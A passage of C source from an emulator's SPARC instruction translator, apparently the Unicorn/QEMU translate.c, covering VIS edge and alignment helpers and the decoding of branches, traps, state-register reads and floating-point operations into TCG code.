tcg_temp_free_i32(tcg_ctx, r_tl); } static void gen_edge(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2, int width, bool cc, bool left) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv lo1, lo2, t1, t2; uint64_t amask, tabl, tabr; int shift, imask, omask; if (cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s2); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1, s2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); dc->cc_op = CC_OP_SUB; } /* Theory of operation: there are two tables, left and right (not to be confused with the left and right versions of the opcode). These are indexed by the low 3 bits of the inputs. To make things "easy", these tables are loaded into two constants, TABL and TABR below. The operation index = (input & imask) << shift calculates the index into the constant, while val = (table >> index) & omask calculates the value we're looking for. 
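E.g. width 8, left, with the low three bits of the input equal to 3: index = 3 << 3 = 24, and (0x80c0e0f0f8fcfeff >> 24) & 0xff = 0xf8.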
*/ switch (width) { case 8: imask = 0x7; shift = 3; omask = 0xff; if (left) { tabl = 0x80c0e0f0f8fcfeffULL; tabr = 0xff7f3f1f0f070301ULL; } else { tabl = 0x0103070f1f3f7fffULL; tabr = 0xfffefcf8f0e0c080ULL; } break; case 16: imask = 0x6; shift = 1; omask = 0xf; if (left) { tabl = 0x8cef; tabr = 0xf731; } else { tabl = 0x137f; tabr = 0xfec8; } break; case 32: imask = 0x4; shift = 0; omask = 0x3; if (left) { tabl = (2 << 2) | 3; tabr = (3 << 2) | 1; } else { tabl = (1 << 2) | 3; tabr = (3 << 2) | 2; } break; default: abort(); } lo1 = tcg_temp_new(tcg_ctx); lo2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, lo1, s1, imask); tcg_gen_andi_tl(tcg_ctx, lo2, s2, imask); tcg_gen_shli_tl(tcg_ctx, lo1, lo1, shift); tcg_gen_shli_tl(tcg_ctx, lo2, lo2, shift); t1 = tcg_const_tl(tcg_ctx, tabl); t2 = tcg_const_tl(tcg_ctx, tabr); tcg_gen_shr_tl(tcg_ctx, lo1, t1, lo1); tcg_gen_shr_tl(tcg_ctx, lo2, t2, lo2); tcg_gen_andi_tl(tcg_ctx, dst, lo1, omask); tcg_gen_andi_tl(tcg_ctx, lo2, lo2, omask); amask = -8; if (AM_CHECK(dc)) { amask &= 0xffffffffULL; } tcg_gen_andi_tl(tcg_ctx, s1, s1, amask); tcg_gen_andi_tl(tcg_ctx, s2, s2, amask); /* We want to compute dst = (s1 == s2 ? lo1 : lo1 & lo2). We've already done dst = lo1, so this reduces to dst &= (s1 == s2 ? -1 : lo2) Which we perform by lo2 |= -(s1 == s2) dst &= lo2 */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t1, s1, s2); tcg_gen_neg_tl(tcg_ctx, t1, t1); tcg_gen_or_tl(tcg_ctx, lo2, lo2, t1); tcg_gen_and_tl(tcg_ctx, dst, dst, lo2); tcg_temp_free(tcg_ctx, lo1); tcg_temp_free(tcg_ctx, lo2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_alignaddr(TCGContext *tcg_ctx, TCGv dst, TCGv s1, TCGv s2, bool left) { TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_add_tl(tcg_ctx, tmp, s1, s2); tcg_gen_andi_tl(tcg_ctx, dst, tmp, -8); if (left) { tcg_gen_neg_tl(tcg_ctx, tmp, tmp); } tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gsr, tcg_ctx->cpu_gsr, tmp, 0, 3); tcg_temp_free(tcg_ctx, tmp); } static void gen_faligndata(TCGContext *tcg_ctx, TCGv dst, TCGv gsr, TCGv s1, TCGv s2) { TCGv t1, t2, shift; t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); shift = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, shift, gsr, 7); tcg_gen_shli_tl(tcg_ctx, shift, shift, 3); tcg_gen_shl_tl(tcg_ctx, t1, s1, shift); /* A shift of 64 does not produce 0 in TCG. Divide this into a shift of (up to 63) followed by a constant shift of 1. 
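E.g. shift = 24: 24 ^ 63 = 39, and (s2 >> 39) >> 1 == s2 >> 40 == s2 >> (64 - 24); for shift = 0 the two defined shifts (63, then 1) correctly produce 0.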
*/ tcg_gen_xori_tl(tcg_ctx, shift, shift, 63); tcg_gen_shr_tl(tcg_ctx, t2, s2, shift); tcg_gen_shri_tl(tcg_ctx, t2, t2, 1); tcg_gen_or_tl(tcg_ctx, dst, t1, t2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, shift); } #endif #define CHECK_IU_FEATURE(dc, FEATURE) \ if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ goto illegal_insn; #define CHECK_FPU_FEATURE(dc, FEATURE) \ if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ goto nfpu_insn; /* before an instruction, dc->pc must be static */ static void disas_sparc_insn(DisasContext * dc, unsigned int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int opc, rs1, rs2, rd; TCGv cpu_src1, cpu_src2; TCGv_i32 cpu_src1_32, cpu_src2_32, cpu_dst_32; TCGv_i64 cpu_src1_64, cpu_src2_64, cpu_dst_64; target_long simm; opc = GET_FIELD(insn, 0, 1); rd = GET_FIELD(insn, 2, 6); switch (opc) { case 0: /* branches/sethi */ { unsigned int xop = GET_FIELD(insn, 7, 9); int32_t target; switch (xop) { #ifdef TARGET_SPARC64 case 0x1: /* V9 BPcc */ { int cc; target = GET_FIELD_SP(insn, 0, 18); target = sign_extend(target, 19); target <<= 2; cc = GET_FIELD_SP(insn, 20, 21); if (cc == 0) do_branch(dc, target, insn, 0); else if (cc == 2) do_branch(dc, target, insn, 1); else goto illegal_insn; goto jmp_insn; } case 0x3: /* V9 BPr */ { target = GET_FIELD_SP(insn, 0, 13) | (GET_FIELD_SP(insn, 20, 21) << 14); target = sign_extend(target, 16); target <<= 2; cpu_src1 = get_src1(dc, insn); do_branch_reg(dc, target, insn, cpu_src1); goto jmp_insn; } case 0x5: /* V9 FBPcc */ { int cc = GET_FIELD_SP(insn, 20, 21); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } target = GET_FIELD_SP(insn, 0, 18); target = sign_extend(target, 19); target <<= 2; do_fbranch(dc, target, insn, cc); goto jmp_insn; } #else case 0x7: /* CBN+x */ { goto ncp_insn; } #endif case 0x2: /* BN+x */ { target = GET_FIELD(insn, 10, 31); target = sign_extend(target, 22); target <<= 2; do_branch(dc, target, insn, 0); goto jmp_insn; } case 0x6: /* FBN+x */ { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } target = GET_FIELD(insn, 10, 31); target = sign_extend(target, 22); target <<= 2; do_fbranch(dc, target, insn, 0); goto jmp_insn; } case 0x4: /* SETHI */ /* Special-case %g0 because that's the canonical nop. */ if (rd) { uint32_t value = GET_FIELD(insn, 10, 31); TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, value << 10); gen_store_gpr(dc, rd, t); } break; case 0x0: /* UNIMPL */ default: goto illegal_insn; } break; } break; case 1: /*CALL*/ { target_long target = GET_FIELDs(insn, 2, 31) << 2; TCGv o7 = gen_dest_gpr(dc, 15); tcg_gen_movi_tl(tcg_ctx, o7, dc->pc); gen_store_gpr(dc, 15, o7); target += dc->pc; gen_mov_pc_npc(dc); #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif dc->npc = target; } goto jmp_insn; case 2: /* FPU & Logical Operations */ { unsigned int xop = GET_FIELD(insn, 7, 12); TCGv cpu_dst = get_temp_tl(dc); TCGv cpu_tmp0; if (xop == 0x3a) { /* generate trap */ int cond = GET_FIELD(insn, 3, 6); TCGv_i32 trap; TCGLabel *l1 = NULL; int mask; if (cond == 0) { /* Trap never. */ break; } save_state(dc); if (cond != 8) { /* Conditional trap. 
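Evaluate the condition, then branch over the trap when it fails: the brcond below uses the inverted condition to jump to l1, so the raise_exception helper runs only when the trap is taken.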
*/ DisasCompare cmp; #ifdef TARGET_SPARC64 /* V9 icc/xcc */ int cc = GET_FIELD_SP(insn, 11, 12); if (cc == 0) { gen_compare(&cmp, 0, cond, dc); } else if (cc == 2) { gen_compare(&cmp, 1, cond, dc); } else { goto illegal_insn; } #else gen_compare(&cmp, 0, cond, dc); #endif l1 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cmp.cond), cmp.c1, cmp.c2, l1); free_compare(tcg_ctx, &cmp); } mask = ((dc->def->features & CPU_FEATURE_HYPV) && supervisor(dc) ? UA2005_HTRAP_MASK : V8_TRAP_MASK); /* Don't use the normal temporaries, as they may well have gone out of scope with the branch above. While we're doing that we might as well pre-truncate to 32-bit. */ trap = tcg_temp_new_i32(tcg_ctx); rs1 = GET_FIELD_SP(insn, 14, 18); if (IS_IMM) { rs2 = GET_FIELD_SP(insn, 0, 7); if (rs1 == 0) { tcg_gen_movi_i32(tcg_ctx, trap, (rs2 & mask) + TT_TRAP); /* Signal that the trap value is fully constant. */ mask = 0; } else { TCGv t1 = gen_load_gpr(dc, rs1); tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); tcg_gen_addi_i32(tcg_ctx, trap, trap, rs2); } } else { TCGv t1, t2; rs2 = GET_FIELD_SP(insn, 0, 4); t1 = gen_load_gpr(dc, rs1); t2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, t1, t1, t2); tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); } if (mask != 0) { tcg_gen_andi_i32(tcg_ctx, trap, trap, mask); tcg_gen_addi_i32(tcg_ctx, trap, trap, TT_TRAP); } gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, trap); tcg_temp_free_i32(tcg_ctx, trap); if (cond == 8) { /* An unconditional trap ends the TB. */ dc->base.is_jmp = DISAS_NORETURN; goto jmp_insn; } else { /* A conditional trap falls through to the next insn. */ gen_set_label(tcg_ctx, l1); break; } } else if (xop == 0x28) { rs1 = GET_FIELD(insn, 13, 17); switch(rs1) { case 0: /* rdy */ #ifndef TARGET_SPARC64 case 0x01: /* undefined in the SPARCv8 manual, rdy on the microSPARC II */ case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: /* stbar in the SPARCv8 manual, rdy on the microSPARC II */ case 0x10: /* implementation-dependent in the SPARCv8 manual, rdy on the microSPARC II */ case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: /* Read Asr17 */ if (rs1 == 0x11 && dc->def->features & CPU_FEATURE_ASR17) { TCGv t = gen_dest_gpr(dc, rd); /* Read Asr17 for a Leon3 monoprocessor */ tcg_gen_movi_tl(tcg_ctx, t, (1 << 8) | (dc->def->nwindows - 1)); gen_store_gpr(dc, rd, t); break; } #endif gen_store_gpr(dc, rd, tcg_ctx->cpu_y); break; #ifdef TARGET_SPARC64 case 0x2: /* V9 rdccr */ update_psr(dc); gen_helper_rdccr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_dst); break; case 0x3: /* V9 rdasi */ tcg_gen_movi_tl(tcg_ctx, cpu_dst, dc->asi); gen_store_gpr(dc, rd, cpu_dst); break; case 0x4: /* V9 rdtick */ { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); gen_store_gpr(dc, rd, cpu_dst); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 0x5: /* V9 rdpc */ { TCGv t = gen_dest_gpr(dc, rd); if (unlikely(AM_CHECK(dc))) { 
tcg_gen_movi_tl(tcg_ctx, t, dc->pc & 0xffffffffULL); } else { tcg_gen_movi_tl(tcg_ctx, t, dc->pc); } gen_store_gpr(dc, rd, t); } break; case 0x6: /* V9 rdfprs */ tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_fprs); gen_store_gpr(dc, rd, cpu_dst); break; case 0xf: /* V9 membar */ break; /* no effect */ case 0x13: /* Graphics Status */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_store_gpr(dc, rd, tcg_ctx->cpu_gsr); break; case 0x16: /* Softint */ tcg_gen_ld32s_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, offsetof(CPUSPARCState, softint)); gen_store_gpr(dc, rd, cpu_dst); break; case 0x17: /* Tick compare */ gen_store_gpr(dc, rd, tcg_ctx->cpu_tick_cmpr); break; case 0x18: /* System tick */ { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); gen_store_gpr(dc, rd, cpu_dst); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 0x19: /* System tick compare */ gen_store_gpr(dc, rd, tcg_ctx->cpu_stick_cmpr); break; case 0x1a: /* UltraSPARC-T1 Strand status */ /* XXX HYPV check maybe not enough, UA2005 & UA2007 describe * this ASR as impl. dep */ CHECK_IU_FEATURE(dc, HYPV); { TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, 1UL); gen_store_gpr(dc, rd, t); } break; case 0x10: /* Performance Control */ case 0x11: /* Performance Instrumentation Counter */ case 0x12: /* Dispatch Control */ case 0x14: /* Softint set, WO */ case 0x15: /* Softint clear, WO */ #endif default: goto illegal_insn; } } else if (xop == 0x29) { /* rdpsr / UA2005 rdhpr */ #ifndef TARGET_SPARC64 if (!supervisor(dc)) { goto priv_insn; } update_psr(dc); gen_helper_rdpsr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); #else CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; rs1 = GET_FIELD(insn, 13, 17); switch (rs1) { case 0: // hpstate tcg_gen_ld_i64(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hpstate)); break; case 1: // htstate // gen_op_rdhtstate(); break; case 3: // hintp tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hintp); break; case 5: // htba tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_htba); break; case 6: // hver tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hver); break; case 31: // hstick_cmpr tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hstick_cmpr); break; default: goto illegal_insn; } #endif gen_store_gpr(dc, rd, cpu_dst); break; } else if (xop == 0x2a) { /* rdwim / V9 rdpr */ if (!supervisor(dc)) { goto priv_insn; } cpu_tmp0 = get_temp_tl(dc); #ifdef TARGET_SPARC64 rs1 = GET_FIELD(insn, 13, 17); switch (rs1) { case 0: // tpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 1: // tnpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tnpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 2: // tstate { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, 
r_tsptr, offsetof(trap_state, tstate)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 3: // tt { TCGv_ptr r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tt)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 4: // tick { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 5: // tba tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_tbr); break; case 6: // pstate tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, pstate)); break; case 7: // tl tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tl)); break; case 8: // pil tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, psrpil)); break; case 9: // cwp gen_helper_rdcwp(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env); break; case 10: // cansave tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cansave)); break; case 11: // canrestore tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, canrestore)); break; case 12: // cleanwin tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cleanwin)); break; case 13: // otherwin tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, otherwin)); break; case 14: // wstate tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, wstate)); break; case 16: // UA2005 gl CHECK_IU_FEATURE(dc, GL); tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, gl)); break; case 26: // UA2005 strand status CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_ssr); break; case 31: // ver tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_ver); break; case 15: // fq default: goto illegal_insn; } #else tcg_gen_ext_i32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_wim); #endif gen_store_gpr(dc, rd, cpu_tmp0); break; } else if (xop == 0x2b) { /* rdtbr / V9 flushw */ #ifdef TARGET_SPARC64 gen_helper_flushw(tcg_ctx, tcg_ctx->cpu_env); #else if (!supervisor(dc)) goto priv_insn; gen_store_gpr(dc, rd, tcg_ctx->cpu_tbr); #endif break; } else if (xop == 0x34) { /* FPU Operations */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_op_clear_ieee_excp_and_FTT(tcg_ctx); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); xop = GET_FIELD(insn, 18, 26); switch (xop) { case 0x1: /* fmovs */ cpu_src1_32 = gen_load_fpr_F(dc, rs2); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x5: /* fnegs */ gen_ne_fop_FF(dc, rd, rs2, gen_helper_fnegs); break; case 0x9: /* fabss */ gen_ne_fop_FF(dc, rd, rs2, gen_helper_fabss); break; case 0x29: /* fsqrts */ CHECK_FPU_FEATURE(dc, FSQRT); gen_fop_FF(dc, rd, rs2, gen_helper_fsqrts); break; case 0x2a: /* fsqrtd */ CHECK_FPU_FEATURE(dc, FSQRT); gen_fop_DD(dc, rd, rs2, gen_helper_fsqrtd); break; case 0x2b: /* fsqrtq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQ(dc, rd, rs2, gen_helper_fsqrtq); break; case 0x41: /* fadds */ gen_fop_FFF(dc, rd, rs1, rs2, 
gen_helper_fadds); break; case 0x42: /* faddd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_faddd); break; case 0x43: /* faddq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_faddq); break; case 0x45: /* fsubs */ gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fsubs); break; case 0x46: /* fsubd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fsubd); break; case 0x47: /* fsubq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fsubq); break; case 0x49: /* fmuls */ CHECK_FPU_FEATURE(dc, FMUL); gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fmuls); break; case 0x4a: /* fmuld */ CHECK_FPU_FEATURE(dc, FMUL); gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld); break; case 0x4b: /* fmulq */ CHECK_FPU_FEATURE(dc, FLOAT128); CHECK_FPU_FEATURE(dc, FMUL); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fmulq); break; case 0x4d: /* fdivs */ gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fdivs); break; case 0x4e: /* fdivd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fdivd); break; case 0x4f: /* fdivq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fdivq); break; case 0x69: /* fsmuld */ CHECK_FPU_FEATURE(dc, FSMULD); gen_fop_DFF(dc, rd, rs1, rs2, gen_helper_fsmuld); break; case 0x6e: /* fdmulq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QDD(dc, rd, rs1, rs2, gen_helper_fdmulq); break; case 0xc4: /* fitos */ gen_fop_FF(dc, rd, rs2, gen_helper_fitos); break; case 0xc6: /* fdtos */ gen_fop_FD(dc, rd, rs2, gen_helper_fdtos); break; case 0xc7: /* fqtos */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_FQ(dc, rd, rs2, gen_helper_fqtos); break; case 0xc8: /* fitod */ gen_ne_fop_DF(dc, rd, rs2, gen_helper_fitod); break; case 0xc9: /* fstod */ gen_ne_fop_DF(dc, rd, rs2, gen_helper_fstod); break; case 0xcb: /* fqtod */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_DQ(dc, rd, rs2, gen_helper_fqtod); break; case 0xcc: /* fitoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QF(dc, rd, rs2, gen_helper_fitoq); break; case 0xcd: /* fstoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QF(dc, rd, rs2, gen_helper_fstoq); break; case 0xce: /* fdtoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QD(dc, rd, rs2, gen_helper_fdtoq); break; case 0xd1: /* fstoi */ gen_fop_FF(dc, rd, rs2, gen_helper_fstoi); break; case 0xd2: /* fdtoi */ gen_fop_FD(dc, rd, rs2, gen_helper_fdtoi); break; case 0xd3: /* fqtoi */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_FQ(dc, rd, rs2, gen_helper_fqtoi); break; #ifdef TARGET_SPARC64 case 0x2: /* V9 fmovd */ cpu_src1_64 = gen_load_fpr_D(dc, rs2); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x3: /* V9 fmovq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_move_Q(dc, rd, rs2); break; case 0x6: /* V9 fnegd */ gen_ne_fop_DD(dc, rd, rs2, gen_helper_fnegd); break; case 0x7: /* V9 fnegq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fnegq); break; case 0xa: /* V9 fabsd */ gen_ne_fop_DD(dc, rd, rs2, gen_helper_fabsd); break; case 0xb: /* V9 fabsq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fabsq); break; case 0x81: /* V9 fstox */ gen_fop_DF(dc, rd, rs2, gen_helper_fstox); break; case 0x82: /* V9 fdtox */ gen_fop_DD(dc, rd, rs2, gen_helper_fdtox); break; case 0x83: /* V9 fqtox */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_DQ(dc, rd, rs2, gen_helper_fqtox); break; case 0x84: /* V9 fxtos */ gen_fop_FD(dc, rd, rs2, gen_helper_fxtos); break; case 0x88: /* V9 fxtod */ gen_fop_DD(dc, rd, rs2, gen_helper_fxtod); break; case 0x8c: /* V9 fxtoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QD(dc, rd, rs2, gen_helper_fxtoq); break; 
#endif default: goto illegal_insn; } } else if (xop == 0x35) { /* FPU Operations */ #ifdef TARGET_SPARC64 int cond; #endif if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_op_clear_ieee_excp_and_FTT(tcg_ctx); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); xop = GET_FIELD(insn, 18, 26); #ifdef TARGET_SPARC64 #define FMOVR(sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 10, 12); \ cpu_src1 = get_src1(dc, insn); \ gen_compare_reg(tcg_ctx, &cmp, cond, cpu_src1); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) if ((xop & 0x11f) == 0x005) { /* V9 fmovsr */ FMOVR(s); break; } else if ((xop & 0x11f) == 0x006) { // V9 fmovdr FMOVR(d); break; } else if ((xop & 0x11f) == 0x007) { // V9 fmovqr CHECK_FPU_FEATURE(dc, FLOAT128); FMOVR(q); break; } #undef FMOVR #endif switch (xop) { #ifdef TARGET_SPARC64 #define FMOVCC(fcc, sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 14, 17); \ gen_fcompare(tcg_ctx, &cmp, fcc, cond); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) case 0x001: /* V9 fmovscc %fcc0 */ FMOVCC(0, s); break; case 0x002: /* V9 fmovdcc %fcc0 */ FMOVCC(0, d); break; case 0x003: /* V9 fmovqcc %fcc0 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(0, q); break; case 0x041: /* V9 fmovscc %fcc1 */ FMOVCC(1, s); break; case 0x042: /* V9 fmovdcc %fcc1 */ FMOVCC(1, d); break; case 0x043: /* V9 fmovqcc %fcc1 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(1, q); break; case 0x081: /* V9 fmovscc %fcc2 */ FMOVCC(2, s); break; case 0x082: /* V9 fmovdcc %fcc2 */ FMOVCC(2, d); break; case 0x083: /* V9 fmovqcc %fcc2 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(2, q); break; case 0x0c1: /* V9 fmovscc %fcc3 */ FMOVCC(3, s); break; case 0x0c2: /* V9 fmovdcc %fcc3 */ FMOVCC(3, d); break; case 0x0c3: /* V9 fmovqcc %fcc3 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(3, q); break; #undef FMOVCC #define FMOVCC(xcc, sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 14, 17); \ gen_compare(&cmp, xcc, cond, dc); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) case 0x101: /* V9 fmovscc %icc */ FMOVCC(0, s); break; case 0x102: /* V9 fmovdcc %icc */ FMOVCC(0, d); break; case 0x103: /* V9 fmovqcc %icc */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(0, q); break; case 0x181: /* V9 fmovscc %xcc */ FMOVCC(1, s); break; case 0x182: /* V9 fmovdcc %xcc */ FMOVCC(1, d); break; case 0x183: /* V9 